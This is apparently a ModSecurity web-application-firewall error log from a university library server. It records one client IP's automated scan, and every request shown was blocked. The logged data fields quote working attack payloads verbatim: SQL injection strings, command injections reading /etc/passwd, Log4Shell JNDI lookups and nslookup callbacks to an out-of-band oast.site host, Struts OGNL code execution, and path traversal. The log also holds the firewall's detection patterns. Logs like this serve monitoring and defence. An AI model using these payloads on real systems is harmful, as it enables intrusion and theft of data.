[Tue Aug 29 11:31:58.391288 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vsCo-f0AAANsAW8AAAAD"]
[Tue Aug 29 11:31:59.309656 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlgojfuo8xkc7d4o.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAN9sRkAAAAJ"]
[Tue Aug 29 11:31:59.348272 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10v8Co-f0AAAN9sRsAAAAJ"]
[Tue Aug 29 11:32:04.358642 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQR4@gAAAAz"]
[Tue Aug 29 11:32:05.475017 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQ7NGIAAAAH"]
[Tue Aug 29 11:32:06.355857 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAP5mOAAAAAM"]
[Tue Aug 29 11:32:06.458565 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAQMrzsAAAAu"]
[Tue Aug 29 11:32:07.787020 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAQOv6cAAAAw"]
[Tue Aug 29 11:32:08.397677 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQV4TgAAAA3"]
[Tue Aug 29 11:32:10.345161 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgqe5f3hwi5hz59.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAN9sSwAAAAJ"]
[Tue Aug 29 11:32:10.428525 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg9kr46r65aucfn.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAN9sS8AAAAJ"]
[Tue Aug 29 11:32:12.361138 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAANsAZUAAAAD"]
[Tue Aug 29 11:32:13.332790 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg8qa9gafj11onn.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg8qa9gafj11onn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQnF8wAAAAF"]
[Tue Aug 29 11:32:13.342889 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQ83Q8AAAAI"]
[Tue Aug 29 11:32:15.342764 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAANsAZwAAAAD"]
[Tue Aug 29 11:32:15.407685 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQ9H1EAAAAK"]
[Tue Aug 29 11:32:15.410982 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfh.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQUIDEAAAA2"]
[Tue Aug 29 11:32:15.411017 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAQUIDEAAAA2"]
[Tue Aug 29 11:32:16.303520 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAANWgZEAAAAG"]
[Tue Aug 29 11:32:17.418851 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAANWgZYAAAAG"]
[Tue Aug 29 11:32:18.333358 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAP5mREAAAAM"]
[Tue Aug 29 11:32:18.368141 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAPiBq0AAAAB"]
[Tue Aug 29 11:32:21.304972 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQMr3QAAAAu"]
[Tue Aug 29 11:32:21.396765 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQ83TYAAAAI"]
[Tue Aug 29 11:32:22.533552 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAPDoEwAAAAP"]
[Tue Aug 29 11:32:23.310439 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAQnF-QAAAAF"]
[Tue Aug 29 11:32:23.354762 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAPDoFAAAAAP"]
[Tue Aug 29 11:32:25.323049 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAPiBrsAAAAB"]
[Tue Aug 29 11:32:25.343819 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAQ9H3AAAAAK"]
[Tue Aug 29 11:32:27.503639 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAAPiBsUAAAAB"]
[Tue Aug 29 11:32:28.405053 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAAQ83UsAAAAI"]
[Tue Aug 29 11:32:30.311473 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARD1OgAAAAH"]
[Tue Aug 29 11:32:31.313359 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAANwN1AAAAAb"]
